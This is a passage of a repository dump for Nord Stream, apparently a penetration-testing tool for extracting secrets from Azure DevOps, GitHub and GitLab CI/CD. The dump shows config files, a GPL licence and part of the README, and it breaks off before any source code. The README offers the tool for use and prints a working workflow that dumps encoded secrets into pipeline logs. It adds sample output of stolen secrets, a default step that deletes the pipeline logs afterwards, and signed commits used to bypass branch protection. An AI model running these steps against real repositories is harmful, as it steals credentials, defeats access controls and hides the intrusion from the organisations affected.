Repository: synacktiv/nord-stream
Branch: main
Commit: 7c96209da201
Files: 32
Total size: 282.7 KB

Directory structure:
gitextract_yz6qr87i/
├── .github/
│   └── ISSUE_TEMPLATE/
│       ├── bug_report.md
│       └── feature_request.md
├── .gitignore
├── .pre-commit-config.yaml
├── CONTRIBUTING.md
├── LICENSE
├── README.md
├── nordstream/
│   ├── __main__.py
│   ├── cicd/
│   │   ├── devops.py
│   │   ├── github.py
│   │   └── gitlab.py
│   ├── commands/
│   │   ├── devops.py
│   │   ├── github.py
│   │   └── gitlab.py
│   ├── core/
│   │   ├── devops/
│   │   │   └── devops.py
│   │   ├── github/
│   │   │   ├── display.py
│   │   │   ├── github.py
│   │   │   └── protections.py
│   │   └── gitlab/
│   │       └── gitlab.py
│   ├── git.py
│   ├── utils/
│   │   ├── constants.py
│   │   ├── devops.py
│   │   ├── errors.py
│   │   ├── helpers.py
│   │   └── log.py
│   └── yaml/
│       ├── custom.py
│       ├── devops.py
│       ├── generator.py
│       ├── github.py
│       └── gitlab.py
├── pyproject.toml
└── requirements.txt

================================================
FILE CONTENTS
================================================

================================================
FILE: .github/ISSUE_TEMPLATE/bug_report.md
================================================
---
name: Bug report
about: Create a report to help us improve
title: "[BUG]"
labels: bug
assignees: hugo-syn
---

**Describe the bug**
A clear and concise description of what the bug is.

**To Reproduce**
Add information that could help us reproduce the bug, such as:

- privileges of the token
- scope of the token
- protections on a branch or environment
- output of the tool with the `--debug` option (don't forget to strip your secrets)

**Screenshots**
If applicable, add screenshots to help explain your problem.

**Additional context**
Add any other context about the problem here.

================================================
FILE: .github/ISSUE_TEMPLATE/feature_request.md
================================================
---
name: Feature request
about: Suggest an idea for this project
title: "[FEAT]"
labels: enhancement
assignees: hugo-syn
---

**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]

**Describe the solution you'd like**
A clear and concise description of what you want to happen.

**Additional context**
Add any other context or screenshots about the feature request here. This can include specific configuration of the SCM or CI/CD system to help us implement the feature.
================================================ FILE: .gitignore ================================================ # Byte-compiled / optimized / DLL files __pycache__/ *.py[cod] *$py.class build/ #custom nord-stream-logs/ notes.md .vscode ================================================ FILE: .pre-commit-config.yaml ================================================ repos: - repo: https://github.com/pre-commit/pre-commit-hooks rev: v6.0.0 hooks: - id: check-added-large-files - id: check-case-conflict - id: check-executables-have-shebangs - id: check-merge-conflict - id: check-shebang-scripts-are-executable - id: end-of-file-fixer - id: fix-byte-order-marker - id: mixed-line-ending args: - --fix=no - id: trailing-whitespace args: - --markdown-linebreak-ext=md - repo: https://github.com/psf/black rev: 26.1.0 hooks: - id: black language_version: python3 args: - --line-length=120 - repo: https://github.com/compilerla/conventional-pre-commit rev: v4.4.0 hooks: - id: conventional-pre-commit stages: [commit-msg] args: [build, chore, ci, docs, feat, fix, perf, refactor, revert, style, test] ================================================ FILE: CONTRIBUTING.md ================================================ # Contributing rules - Install [`pre-commit`](https://pre-commit.com/). - Enable `pre-commit` hooks in the repository folder: `pre-commit install && pre-commit install --hook-type commit-msg`. These hooks automatically format the code and check the format of the commit message. - The format of commit messages must follow the [Conventional Commits](https://www.conventionalcommits.org/en/v1.0.0/) convention. ================================================ FILE: LICENSE ================================================ GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU General Public License is a free, copyleft license for software and other kinds of works. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. 
Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it. For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions. Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users. Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. 
Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 
No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. 
You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. 
"Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. 
Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. 
Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. 
If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. "Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Use with the GNU Affero General Public License. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. 
The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation. If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. 
It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found.

    <one line to give the program's name and a brief idea of what it does.>
    Copyright (C) <year>  <name of author>

    This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

    This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

    You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>.

Also add information on how to contact you by electronic and paper mail.

If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode:

    <program>  Copyright (C) <year>  <name of author>
    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
    This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details.

The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, your program's commands might be different; for a GUI interface, you would use an "about box".

You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see <https://www.gnu.org/licenses/>.

The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read <https://www.gnu.org/philosophy/why-not-lgpl.html>.

================================================
FILE: README.md
================================================
# Nord Stream

Nord Stream is a tool that allows you to extract secrets stored inside CI/CD environments by deploying _malicious_ pipelines. It currently supports Azure DevOps, GitHub and GitLab.

Find out more in the following blogpost: https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks

## Table of Contents

- [Nord Stream](#nord-stream)
  - [Table of Contents](#table-of-contents)
  - [Installation](#installation)
  - [Usage](#usage)
    - [Shared arguments](#shared-arguments)
      - [Describe token](#describe-token)
      - [Build YAML](#build-yaml)
      - [YAML](#yaml)
      - [Clean logs](#clean-logs)
      - [Signing commits](#signing-commits)
    - [Azure DevOps](#azure-devops)
      - [Service connections](#service-connections)
        - [SSH](#ssh)
      - [Listing orgs](#listing-orgs)
      - [Help](#help)
    - [GitHub](#github)
      - [List protections](#list-protections)
      - [Disable protections](#disable-protections)
      - [Force](#force)
      - [Azure OIDC](#azure-oidc)
      - [AWS OIDC](#aws-oidc)
      - [Help](#help-1)
    - [GitLab](#gitlab)
      - [List secrets](#list-secrets)
      - [YAML](#yaml-1)
      - [List protections](#list-protections-1)
      - [Help](#help-2)
  - [TODO](#todo)
  - [Contact](#contact)

## Installation

```
$ pipx install git+https://github.com/synacktiv/nord-stream
```

`git` is also required (see https://git-scm.com/download/) and must exist in your `PATH`.

## Usage

Here is a simple example on GitHub.
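Under the hood, Nord Stream pushes a short-lived workflow to the repository and recovers the secrets from its logs. The sketch below illustrates the idea; it mirrors the file the tool actually generates (shown verbatim in the [Build YAML](#build-yaml) section), with `REPO_SECRET` standing in for whatever secret names are targeted:

```yaml
# Sketch of the kind of workflow Nord Stream deploys: the targeted secrets
# are mapped into the job environment, then dumped (double base64-encoded)
# into the workflow logs, where the tool reads them back.
name: GitHub Actions
'on': push
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
      - run: env -0 | awk -v RS='\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0
        name: command
        env:
          secret_REPO_SECRET: ${{secrets.REPO_SECRET}}
```

Initially, one can enumerate the various secrets: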
```sh
$ nord-stream github --token "$GHP" --org org --list-secrets --repo repo
[*] Listing secrets:
[*] "org/repo" secrets
[*] Repo secrets:
    - REPO_SECRET
    - SUPER_SECRET
[*] PROD secrets:
    - PROD_SECRET
```

Then proceed to the exfiltration:

```sh
$ nord-stream github --token "$GHP" --org org --repo repo
[+] "org/repo"
[*] No branch protection rule found on "dev_remote_ea5Eu/test/v1" branch
[*] Getting secrets from repo: "org/repo"
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
secret_SUPER_SECRET=value for super secret
secret_REPO_SECRET=repository secret
[*] Getting secrets from environment: "PROD" (org/repo)
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
secret_PROD_SECRET=Value only accessible from prod environment
[*] Cleaning logs.
[*] Check output: /home/hugov/Documents/pentest/RD/CICD/tools/nord-stream/nord-stream/nord-stream-logs/github
```

### Shared arguments

Some arguments are shared between [GitHub](#github), [Azure DevOps](#azure-devops) and [GitLab](#gitlab); here are some examples.

#### Describe token

The `--describe-token` option can be used to display general information about your token:

```bash
$ nord-stream github --token "$PAT" --describe-token
[*] Token information:
- Login: CICD
- IsAdmin: False
- Id: 1337
- Bio: None
```

#### Build YAML

The `--build-yaml` option can be used to create a pipeline file without deploying it. It retrieves the various secret names and builds the associated pipeline, which can then be edited to add custom steps:

```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --env PROD --build-yaml custom.yml
[+] YAML file:
name: GitHub Actions
'on': push
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
      - run: env -0 | awk -v RS='\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0
        name: command
        env:
          secret_PROD_SECRET: ${{secrets.PROD_SECRET}}
    environment: PROD
```

#### YAML

The `--yaml` option can be used to deploy a custom pipeline:

```yml
name: GitHub Actions
'on': push
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Hello from step 1"
        name: step 1
      - run: echo "Doing some important stuff here"
        name: command
      - run: echo "Hello from last step "
        name: last step
```

```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --yaml custom.yml
[+] "synacktiv/repo"
[*] No branch protection rule found on "dev_remote_ea5Eu/test/v1" branch
[*] Running custom workflow: .../custom.yml
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Workflow output:
2023-07-18T20:08:33.0073670Z ##[group]Run echo "Doing some important stuff here"
2023-07-18T20:08:33.0074247Z echo "Doing some important stuff here"
2023-07-18T20:08:33.0136846Z shell: /usr/bin/bash -e {0}
2023-07-18T20:08:33.0137261Z ##[endgroup]
2023-07-18T20:08:33.0422019Z Doing some important stuff here
[*] Cleaning logs.
[*] Check output: .../nord-stream-logs/github
```

By default, it will display the output of the task named `command` of the `init` job, but everything is stored locally and can be accessed manually:

```bash
$ cat nord-stream-logs/github/synacktiv/repo/workflow_custom_2023-07-18_22-08-44/init/4_last\ step.txt
2023-07-18T20:08:33.0458509Z ##[group]Run echo "Hello from last step "
2023-07-18T20:08:33.0459084Z echo "Hello from last step "
2023-07-18T20:08:33.0511473Z shell: /usr/bin/bash -e {0}
2023-07-18T20:08:33.0511890Z ##[endgroup]
2023-07-18T20:08:33.0597853Z Hello from last step
```

#### Clean logs

By default, Nord Stream will attempt to remove traces left after a pipeline deployment, depending on your privileges. To preserve traces, the `--no-clean` option can be used. This keeps the pipeline logs; the changes made to the repository are still reverted. Note that for GitLab, some traces cannot be deleted.

#### Signing commits

Repository administrators can enforce required commit signing on a branch to block all commits that are not signed and verified. With Nord Stream, it's possible to sign commits to bypass such a protection. First, create and import your GPG key on the SCM platform:

```sh
$ gpg --full-generate-key
$ gpg --armor --export F94496913C43EFC5
$ gpg --list-secret-keys --keyid-format=long
sec   dsa2048/F94496913C43EFC5 2023-07-18 [SC] [expires: 2023-07-23]
      Key fingerprint = B158 3F43 9899 C5A3 B74E D04B F944 9691 3C43 EFC5
uid                 [ultimate] test-gpg
```

```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --branch-name main --key-id F94496913C43EFC5 --user test-gpg --email test.gpg@cicd.local --force
[*] Using branch: "main"
[+] "synacktiv/repo"
[*] Getting secrets from environment: "prod" (synacktiv/repo)
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
